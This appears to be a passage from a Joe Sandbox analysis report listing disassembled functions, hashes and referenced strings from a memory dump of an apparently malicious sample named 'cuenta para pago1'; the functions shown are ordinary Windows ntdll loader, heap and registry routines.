                                                                                      • Instruction ID: 2a2c5755b3e6ccc3b89d141013bccf4704c39f5912b571388386493c8819a66b
                                                                                      • Opcode Fuzzy Hash: 0dff8942b2b0f5728a95bbec8d8c3f64f19a4ecaac0e9c0858ee960cb65b5e2b
                                                                                      • Instruction Fuzzy Hash: 8BA1587690162D9FEB31DB24CC89BDAB7B8EF44710F1046EAE909A7250DB359E84CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3495327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                      • API String ID: 0-318774311
                                                                                      • Opcode ID: 2c019b0de65c7da9e3f7266807406b5552bfa2c7b86867cb1dbb91ad0555e602
                                                                                      • Instruction ID: 7a6f83b0fd02b9cc768712faf55d33dcc3c2e46faed259d033ceacc6c62ea904
                                                                                      • Opcode Fuzzy Hash: 2c019b0de65c7da9e3f7266807406b5552bfa2c7b86867cb1dbb91ad0555e602
                                                                                      • Instruction Fuzzy Hash: B381AE71208340AFE321CF64C840B6AB7E9FF88750F5049ADF9949B2A0DB74DD04CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3499B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3499B3AA
                                                                                      • TargetNtPath, xrefs: 3499B3AF
                                                                                      • GlobalizationUserSettings, xrefs: 3499B3B4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                      • API String ID: 0-505981995
                                                                                      • Opcode ID: f55375614dd80e34f4a90aaed32021f719c7ab85e47eecf84eb482ed2deb19d4
                                                                                      • Instruction ID: bfe83acbddc9976f58a5f11825df418ed83ddb390df682770a8e92c350b28b53
                                                                                      • Opcode Fuzzy Hash: f55375614dd80e34f4a90aaed32021f719c7ab85e47eecf84eb482ed2deb19d4
                                                                                      • Instruction Fuzzy Hash: D9612C72941629EFEB71DB54DC88BDAB7F8BB04710F4101E9A508AB250DB78DE84CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3491E455
                                                                                      • HEAP: , xrefs: 3491E442
                                                                                      • HEAP[%wZ]: , xrefs: 3491E435
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                      • API String ID: 0-1340214556
                                                                                      • Opcode ID: e8a914fa183fcf25d4c94e1ea2f3d27326c5924babe0ed65a3711c3aa3475996
                                                                                      • Instruction ID: e05b6db440a15b53090c51c7495b8b7822eabfa8448a48b7250678e896954880
                                                                                      • Opcode Fuzzy Hash: e8a914fa183fcf25d4c94e1ea2f3d27326c5924babe0ed65a3711c3aa3475996
                                                                                      • Instruction Fuzzy Hash: 7651B035604688EFFB12CBA8C884F5ABBE8EF05744F0442A5E694CB792D774E901DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348E1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpCompleteMapModule, xrefs: 3492A39D
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 3492A396
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 3492A3A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      • Opcode ID: 18d8095fb6ae8a84d867fb960319313a1a2e8bbb07f5265b1ce31652727b9a85
                                                                                      • Instruction ID: 5d6cf5fd36f9cc7e6da76047a7ffb225fa8e897b8b27ae210aef5ed27fcd3299
                                                                                      • Opcode Fuzzy Hash: 18d8095fb6ae8a84d867fb960319313a1a2e8bbb07f5265b1ce31652727b9a85
                                                                                      • Instruction Fuzzy Hash: 30512275B04749DFF711CB68C840B2AB7E8FB02754F5003A8E8629BAE1DB74E980CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3496D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3496D7B2
                                                                                      • HEAP: , xrefs: 3496D79F
                                                                                      • HEAP[%wZ]: , xrefs: 3496D792
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                      • API String ID: 0-3815128232
                                                                                      • Opcode ID: 0b3eba530c533c312b0effe3ec68faa315df41aa010ca143159291cf5ad190fd
                                                                                      • Instruction ID: 5b2a6ddfaac3237fd31fb87473050178d1a6d9d41418cbbaab0e85064eedeb36
                                                                                      • Opcode Fuzzy Hash: 0b3eba530c533c312b0effe3ec68faa315df41aa010ca143159291cf5ad190fd
                                                                                      • Instruction Fuzzy Hash: CB514AB9200350CEF360CA29C44077277EADF852ACF414A4EE4E79B681D63DD443DB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348B753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                      • API String ID: 0-1151232445
                                                                                      • Opcode ID: cece431b4028ca88c4ed2d1607121ac5d85c1261685bf531363ba3eb3a635bef
                                                                                      • Instruction ID: 31342c96f9334533e4a891cfa65dad379a0d38f8ab7c06d1a35ca3931e89e091
                                                                                      • Opcode Fuzzy Hash: cece431b4028ca88c4ed2d1607121ac5d85c1261685bf531363ba3eb3a635bef
                                                                                      • Instruction Fuzzy Hash: C841E5BC2007888FFF15DA1CC4847A677E8DF12345F6485ADD4CA8BB56CAB5D845CB21
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3494B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • GlobalFlag, xrefs: 3494B30F
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3494B2B2
                                                                                      • @, xrefs: 3494B2F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: db21f1522f0ede3fb17c4597ce833fbdb0eacfbc98d94329234dae99b092ea40
                                                                                      • Instruction ID: c67b14f70fcf7e0aaeb43589370404c6af9173cc76b84247ba9ba61cc0224d50
                                                                                      • Opcode Fuzzy Hash: db21f1522f0ede3fb17c4597ce833fbdb0eacfbc98d94329234dae99b092ea40
                                                                                      • Instruction Fuzzy Hash: D6312CB5E01209EFEB10DFA5DC80AEEBBBCEF44744F4044A9E615AB255D7749E04CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34901190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3490119B
                                                                                      • BuildLabEx, xrefs: 3490122F
                                                                                      • @, xrefs: 349011C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                      • API String ID: 0-3051831665
                                                                                      • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                      • Instruction ID: 459c00ad99d2d3699e5b6ab73fe1d9fb895ef63c647cdd5efd41b21e8e815363
                                                                                      • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                      • Instruction Fuzzy Hash: 4F3152B2901619FFEB21DB98CC45E9EBB7DEB44750F108125E514E7150DB31DD058F90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 349485AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 349485DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                      • API String ID: 0-702105204
                                                                                      • Opcode ID: fad3916961d83e1750702c7f654991243a55f882524ac62da9e84688015c1834
                                                                                      • Instruction ID: 2feaea057769710c7bcd57cb86f4c20413215954ce390c79bc72199a7f0320e4
                                                                                      • Opcode Fuzzy Hash: fad3916961d83e1750702c7f654991243a55f882524ac62da9e84688015c1834
                                                                                      • Instruction Fuzzy Hash: 5701F239604204DFFAE6EE54D844A5A7B6EEF413A8F4009ECE64116B52CB20AC41CE98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348D51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: 81ccf8d3d1297c7b8a1fcbe4f4c79413171738b1ed64035b4419bfe28ab44a50
                                                                                      • Instruction ID: 95484406ee15ed76b22771538a4cb8d3eafa0718cea365a46f6f3705b03fed17
                                                                                      • Opcode Fuzzy Hash: 81ccf8d3d1297c7b8a1fcbe4f4c79413171738b1ed64035b4419bfe28ab44a50
                                                                                      • Instruction Fuzzy Hash: A932CFB460A3158FD754CF18C480B2EB7F5EF8A744F504A2EF9958B6A0EB34C944CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: c9956ce68362f2e78ea8dfb627f27b0a77c222b76db76e3d17a19b35d8acdb5b
                                                                                      • Instruction ID: 34609d0aaba004fffc4a1d4424a925f958bd8ffc9ce25a3666eee6f6ca3131ec
                                                                                      • Opcode Fuzzy Hash: c9956ce68362f2e78ea8dfb627f27b0a77c222b76db76e3d17a19b35d8acdb5b
                                                                                      • Instruction Fuzzy Hash: 97319035302B1AEFEB859F64C940E8AFBA9FF44794F404225E91157A50EBB0ED21DF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3499B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RedirectedKey, xrefs: 3499B60E
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3499B5C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                      • API String ID: 0-1388552009
                                                                                      • Opcode ID: 8a5813277471ab9f312ab33476ae148573c90287475515ef273c4310f6971969
                                                                                      • Instruction ID: 4401db64abae3a28077e925643cfe5e6ac99605938e09e5b57c10abb9aa0eb28
                                                                                      • Opcode Fuzzy Hash: 8a5813277471ab9f312ab33476ae148573c90287475515ef273c4310f6971969
                                                                                      • Instruction Fuzzy Hash: EE61F2B5C01219EFDF11CFA4C888ADEBBB9FB48710F50416AE805E7250DB749A46DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348DF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$
                                                                                      • API String ID: 3446177414-233714265
                                                                                      • Opcode ID: 42254848fa5576890d97c23f5fcdc5f7d29e7ad41ee6698e4b140d51ee62497c
                                                                                      • Instruction ID: d64b050e83a63d0057c55b33e0c961293cca29780c62ff5dcf32719f66d214e1
                                                                                      • Opcode Fuzzy Hash: 42254848fa5576890d97c23f5fcdc5f7d29e7ad41ee6698e4b140d51ee62497c
                                                                                      • Instruction Fuzzy Hash: 5261EEB5A02749CFEB20DFA8C590B9DB7F1FF45308F104669D2146B690CBB5A981EB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348CA1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 348CA229
                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 348CA21B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                      • API String ID: 0-2876891731
                                                                                      • Opcode ID: da03861bcb92a14fdcb812fa8e54973019a59a52aa86a3e16c0f5bd6829b9821
                                                                                      • Instruction ID: bfac0379158bc23e3e2763c1c320fef163bc4a9e8c66ad5b7ad1e6af7553e666
                                                                                      • Opcode Fuzzy Hash: da03861bcb92a14fdcb812fa8e54973019a59a52aa86a3e16c0f5bd6829b9821
                                                                                      • Instruction Fuzzy Hash: EA41DD79B00768DFEB01CF99D940BAAB7B8EF45744F2042A9E810DF2A5E676DD00CB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3495314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: 63450546733e00d70d9601db211c5ed90aa72a66d21ceb25b98d92fb586e02d8
                                                                                      • Instruction ID: dedd337326524f2ffffd837b81150f819329c52e61a3f10c157baeeec789bbd2
                                                                                      • Opcode Fuzzy Hash: 63450546733e00d70d9601db211c5ed90aa72a66d21ceb25b98d92fb586e02d8
                                                                                      • Instruction Fuzzy Hash: E231C176209B41DFE321DB69E840B1AB7E8EF89750F20099DF854CB3A1EB71D905CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F31BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local\$@
                                                                                      • API String ID: 0-380025441
                                                                                      • Opcode ID: d189fbb91a51a7a542f1ed95a099d341e29745688bfbc3a15fe0913da2afa432
                                                                                      • Instruction ID: 62a42a085c39cc266347f5bcf1a1f830b575c6430e03588df7dee50a2f2689ae
                                                                                      • Opcode Fuzzy Hash: d189fbb91a51a7a542f1ed95a099d341e29745688bfbc3a15fe0913da2afa432
                                                                                      • Instruction Fuzzy Hash: 3E3191B6649305EFE311DF68D880A5BBBE8FB85654F400A2EF99487250D735DD08CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348CC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: MUI
                                                                                      • API String ID: 0-1339004836
                                                                                      • Opcode ID: 3027d666656b8a6155f359df0a89277372d69cfb65f5ddcff2c0a27378efaa5d
                                                                                      • Instruction ID: d8323953e68d0506906c46099d55a0c458528d23d70dbdca6e6cbf274d29a312
                                                                                      • Opcode Fuzzy Hash: 3027d666656b8a6155f359df0a89277372d69cfb65f5ddcff2c0a27378efaa5d
                                                                                      • Instruction Fuzzy Hash: 648239B9E00218CFEB14DFA9C880B9DF7B5BF48754F10826AD859AB250EB74DD85CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C64F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d20feb0d80d398518ee454d07ba812ab57a12e97eb94caa6527275bd04c70b01
                                                                                      • Instruction ID: 0002e6b8dba620e39072ff04183132255895634c9bcf25a61c35037951fd8359
                                                                                      • Opcode Fuzzy Hash: d20feb0d80d398518ee454d07ba812ab57a12e97eb94caa6527275bd04c70b01
                                                                                      • Instruction Fuzzy Hash: 84E18874609342CFD304CF28C090A5AFBE1FF89354F558A6DE999A7361DB31E906CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348EE507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44b1e71c2eeb4eed1c3f158e53cdd1bfb4dff9752d28eaf18840c6821de37a6a
                                                                                      • Instruction ID: 56304ad3c6562cde60eacd3aad8b78706bbad69d09151728e40c49e9ac0ddf03
                                                                                      • Opcode Fuzzy Hash: 44b1e71c2eeb4eed1c3f158e53cdd1bfb4dff9752d28eaf18840c6821de37a6a
                                                                                      • Instruction Fuzzy Hash: 42A1D675F0071CEFFB21CBA4C844BAEBBA8EF05758F014265E910AB295D7749D44CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C1051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 7e201a46ef1dde4922eb28c70d51b3a3ec05f7340af90d191739010d0093a2ea
                                                                                      • Instruction ID: 994c163e0398cbad9e34f446e987430fb9052063f9614d798dd9e6c696b7a627
                                                                                      • Opcode Fuzzy Hash: 7e201a46ef1dde4922eb28c70d51b3a3ec05f7340af90d191739010d0093a2ea
                                                                                      • Instruction Fuzzy Hash: 59B111B56093848FE354CF28C480A5AFBF5BB88304F548A6EE899C7352D771E845CF42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

